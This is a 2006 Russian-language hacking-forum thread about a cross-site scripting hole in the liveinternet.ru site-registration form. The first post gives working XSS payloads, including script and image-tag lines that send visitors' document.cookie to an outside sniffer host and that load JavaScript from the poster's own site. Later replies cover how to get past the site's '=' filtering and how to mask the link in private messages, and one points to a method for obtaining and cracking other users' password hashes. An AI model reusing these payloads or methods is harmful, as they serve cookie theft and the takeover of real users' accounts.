liveinternet

Discussion in 'Уязвимости' started by LeverOne, 11 Nov 2006.

Thread Status:
Not open for further replies.
  1. LeverOne

    LeverOne Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    52
    Likes Received:
    128
    Reputations:
    115
    найдено D=P=CH= MOD=
    http://www.liveinternet.ru/add

    Вводим
    "><script>alert("xss")</script>

    алерт работает!
    Но КУКИ не приходят!!!!
    Хотя ввожу в поле "Ключевые слова" все верно:
    "<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
    либо
    "<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    и даже этим способом:
    "<srcipt src=http://мой_сайт.ru/js.js></script>

    Пробую "регить сайт", заходя со своего акка.
    Не приходят, мать их!!!

    Не понимаю, в чем дело? Подскажите!
     
    #1 LeverOne, 11 Nov 2006
    Last edited: 11 Nov 2006
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Может изза браузера.
     
    1 person likes this.
  3. Kalowrat

    Kalowrat New Member

    Joined:
    3 Nov 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
    если ничо не путаю.. давно это было
     
  4. LeverOne

    LeverOne Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    52
    Likes Received:
    128
    Reputations:
    115
    ОК

    Все работает.
    Просто пытаются фильтровать "="
    Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях.
    Вариант со скриптом на собственном хосте прекрасно прокатывает.
    Тема исчерпана.
     
  5. DeadFire

    DeadFire New Member

    Joined:
    5 May 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.

    Очень надо.

    Заранее спасибо.
     
  6. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    http://forum.antichat.ru/thread29020.html
    получишь хеш пароля в md5(вроде бы)
    потом расшифруешь пароль и зайдешь...
     
Thread Status:
Not open for further replies.